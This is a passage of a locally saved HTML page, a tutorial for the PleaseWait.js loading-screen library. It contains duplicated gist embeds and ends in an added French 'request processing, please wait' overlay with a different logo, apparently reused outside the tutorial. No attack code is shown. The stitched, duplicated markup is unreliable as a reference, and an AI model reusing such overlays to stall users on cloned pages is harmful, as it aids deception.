        <td id="file-default-css-LC6" class="blob-code blob-code-inner js-file-line">  <span class="pl-c1"><span class="pl-c1">display</span></span>: <span class="pl-c1">block</span>;</td>
      </tr>
      <tr>
        <td id="file-default-css-L7" class="blob-num js-line-number" data-line-number="7"></td>
        <td id="file-default-css-LC7" class="blob-code blob-code-inner js-file-line">}</td>
      </tr>
</tbody></table>


  </div>

  </div>
</div>

      </div>
   
    </div>
</div>

          </section>
          <section>
            <h4>Step 4: Show the loading screen</h4>
            <p>
              As soon as possible in your app, call <code>pleaseWait</code> to trigger the loading screen. Right now, the API is quite simple. Valid options are:
              </p><ul>
                <li><code>backgroundColor</code> - Needs to be a valid CSS color.</li>
                <li><code>logo</code> - The URL to a logo to display. The <code>src</code> attribute of an <code>img</code> tag will be set to this value.</li>
                <li><code>loadingHtml</code> - HTML to display below the logo. Can be a message, spinner, or any HTML you want. See <a href="http://tobiasahlin.com/spinkit/" target="_blank">SpinKit</a> for some great HTML/CSS3 spinners.</li>
              </ul>
              pleaseWait returns the loading screen when called. You'll 
want to save this in order to close the loading screen later.
            <p></p>
            <script src="index_files/885fc10cf53e50c4425a.t%25C3%25A9l%25C3%25A9chargement"></script>
			<link rel="stylesheet" href="index_files/gist-embed-1564cdcc2939872e81719982075d3d93.htm"><div id="gist17215306" class="gist">
    <div class="gist-file">
      <div class="gist-data">
        <div class="js-gist-file-update-container js-task-list-container file-box">
  <div id="file-load-js" class="file">
    

  <div itemprop="text" class="blob-wrapper data type-javascript ">
      <table class="highlight tab-size js-file-line-container" data-tab-size="8">
      <tbody><tr>
        <td id="file-load-js-L1" class="blob-num js-line-number" data-line-number="1"></td>
        <td id="file-load-js-LC1" class="blob-code blob-code-inner js-file-line"><span class="pl-k">var</span> loading_screen <span class="pl-k">=</span> <span class="pl-en">pleaseWait</span>({</td>
      </tr>
      <tr>
        <td id="file-load-js-L2" class="blob-num js-line-number" data-line-number="2"></td>
        <td id="file-load-js-LC2" class="blob-code blob-code-inner js-file-line">  logo<span class="pl-k">:</span> <span class="pl-s"><span class="pl-pds">"</span>assets/images/pathgather.png<span class="pl-pds">"</span></span>,</td>
      </tr>
      <tr>
        <td id="file-load-js-L3" class="blob-num js-line-number" data-line-number="3"></td>
        <td id="file-load-js-LC3" class="blob-code blob-code-inner js-file-line">  backgroundColor<span class="pl-k">:</span> <span class="pl-s"><span class="pl-pds">'</span>#f46d3b<span class="pl-pds">'</span></span>,</td>
      </tr>
      <tr>
        <td id="file-load-js-L4" class="blob-num js-line-number" data-line-number="4"></td>
        <td id="file-load-js-LC4" class="blob-code blob-code-inner js-file-line">  loadingHtml<span class="pl-k">:</span> <span class="pl-s"><span class="pl-pds">"</span>&lt;div
 class='sk-spinner sk-spinner-wave'&gt;&lt;div 
class='sk-rect1'&gt;&lt;/div&gt;&lt;div 
class='sk-rect2'&gt;&lt;/div&gt;&lt;div 
class='sk-rect3'&gt;&lt;/div&gt;&lt;div 
class='sk-rect4'&gt;&lt;/div&gt;&lt;div 
class='sk-rect5'&gt;&lt;/div&gt;&lt;/div&gt;<span class="pl-pds">"</span></span></td>
      </tr>
      <tr>
        <td id="file-load-js-L5" class="blob-num js-line-number" data-line-number="5"></td>
        <td id="file-load-js-LC5" class="blob-code blob-code-inner js-file-line">});</td>
      </tr>
</tbody></table>


  </div>

  </div>
</div>

      </div>
      
    </div>
</div>
<link rel="stylesheet" href="index_files/gist-embed-1564cdcc2939872e81719982075d3d93.css"><div id="gist17215306" class="gist">
    <div class="gist-file">
      <div class="gist-data">
        <div class="js-gist-file-update-container js-task-list-container file-box">
  <div id="file-load-js" class="file">
    

  <div itemprop="text" class="blob-wrapper data type-javascript ">
      <table class="highlight tab-size js-file-line-container" data-tab-size="8">
      <tbody><tr>
        <td id="file-load-js-L1" class="blob-num js-line-number" data-line-number="1"></td>
        <td id="file-load-js-LC1" class="blob-code blob-code-inner js-file-line"><span class="pl-k">var</span> loading_screen <span class="pl-k">=</span> <span class="pl-en">pleaseWait</span>({</td>
      </tr>
      <tr>
        <td id="file-load-js-L2" class="blob-num js-line-number" data-line-number="2"></td>
        <td id="file-load-js-LC2" class="blob-code blob-code-inner js-file-line">  logo<span class="pl-k">:</span> <span class="pl-s"><span class="pl-pds">"</span>assets/images/pathgather.png<span class="pl-pds">"</span></span>,</td>
      </tr>
      <tr>
        <td id="file-load-js-L3" class="blob-num js-line-number" data-line-number="3"></td>
        <td id="file-load-js-LC3" class="blob-code blob-code-inner js-file-line">  backgroundColor<span class="pl-k">:</span> <span class="pl-s"><span class="pl-pds">'</span>#f46d3b<span class="pl-pds">'</span></span>,</td>
      </tr>
      <tr>
        <td id="file-load-js-L4" class="blob-num js-line-number" data-line-number="4"></td>
        <td id="file-load-js-LC4" class="blob-code blob-code-inner js-file-line">  loadingHtml<span class="pl-k">:</span> <span class="pl-s"><span class="pl-pds">"</span>&lt;div
 class='sk-spinner sk-spinner-wave'&gt;&lt;div 
class='sk-rect1'&gt;&lt;/div&gt;&lt;div 
class='sk-rect2'&gt;&lt;/div&gt;&lt;div 
class='sk-rect3'&gt;&lt;/div&gt;&lt;div 
class='sk-rect4'&gt;&lt;/div&gt;&lt;div 
class='sk-rect5'&gt;&lt;/div&gt;&lt;/div&gt;<span class="pl-pds">"</span></span></td>
      </tr>
      <tr>
        <td id="file-load-js-L5" class="blob-num js-line-number" data-line-number="5"></td>
        <td id="file-load-js-LC5" class="blob-code blob-code-inner js-file-line">});</td>
      </tr>
</tbody></table>


  </div>

  </div>
</div>

      </div>
     
    </div>
</div>

          </section>
          <section>
            <h4>Step 5: Close the loading screen</h4>
            <p>
              Whenever you're app is ready for the user, call <code>finish()</code> on the returned object from the <code>pleaseWait</code> call. This will fade the screen out.
            </p>
          </section>
          <section>
            <h4>Bonus Section! Update the HTML</h4>
            <p>
              If you want to update the <code>loadingHtml</code> displayed, call <code>updateLoadingHtml(html)</code> on the returned object from <code>pleaseWait</code>.
 This, by default, will fade the current HTML out and the given HTML in.
 This is useful if you want to cycle through messages (in case your app 
takes a good bit of time to load), show a login form within the loading 
screen, etc.
            </p>
          </section>
        </section>
      </div>
    </div>
  
        <i class="fa fa-times"></i>
        
      
    
    
          
        
      
    
    <script type="text/javascript" src="index_files/please-wait.t%25C3%25A9l%25C3%25A9chargement"></script>
    <script type="text/javascript">
      window.loading_screen = window.pleaseWait({
        logo: "assets/images/pathgather.png",
        backgroundColor: '#f46d3b',
        loadingHtml: "<p class='loading-message'></p><div 
class='sk-spinner sk-spinner-wave'><div class='sk-rect1'></div><div 
class='sk-rect2'></div><div class='sk-rect3'></div><div 
class='sk-rect4'></div><div class='sk-rect5'></div></div>"
      });
    </script><div style="background-color: rgb(247,247,247);" class="pg-loading-screen pg-loading"><div class="pg-loading-inner">
  <div class="pg-loading-center-outer">
    <div class="pg-loading-center-middle">
      <h1 class="pg-loading-logo-header">
        <img src="index_files/pathgather.htm" class="pg-eing-logo">
      </h1>
      <div class="pg-loading-html pg-loaded"><p class="loading-message"></p>
	  
<div class="sk-spinner sk-spinner-wave"><div class="sk-rect1"></div><div class="sk-rect2"></div><div class="sk-rect3"></div><div class="sk-rect4"></div><div class="sk-rect5"></div></div></div>
    </div>
  </div>
</div></div><div class="pg-loading-screen pg-loading" style="background-color: rgb(247,247,247);"><div class="pg-loading-inner">
  <div class="pg-loading-center-outer">
    <div class="pg-loading-center-middle">
      <h1 class="pg-loading-logo-header">
        <img class="pg-loading-logo" style="height:200px"src="index_files/cm.png">
      </h1>
      <div class="pg-loading-html pg-loaded"><p style="color:white;font-family:new time romain;font-size:16px;color:#291E6A" class="loading-message">veuillez Patientez .Traitement de requete en cours ...</p>
	  <div class="sk-spinner sk-spinner-wave">
<div class="sk-rect1"></div><div class="sk-rect2"></div><div class="sk-rect3"></div><div class="sk-rect4"></div><div class="sk-rect5"></div></div></div>
    </div>
  </div>
</div></div>
    <script src="index_files/angular.t%25C3%25A9l%25C3%25A9chargement"></script>
    <script src="index_files/default.t%25C3%25A9l%25C3%25A9chargement"></script>
  
</body></html>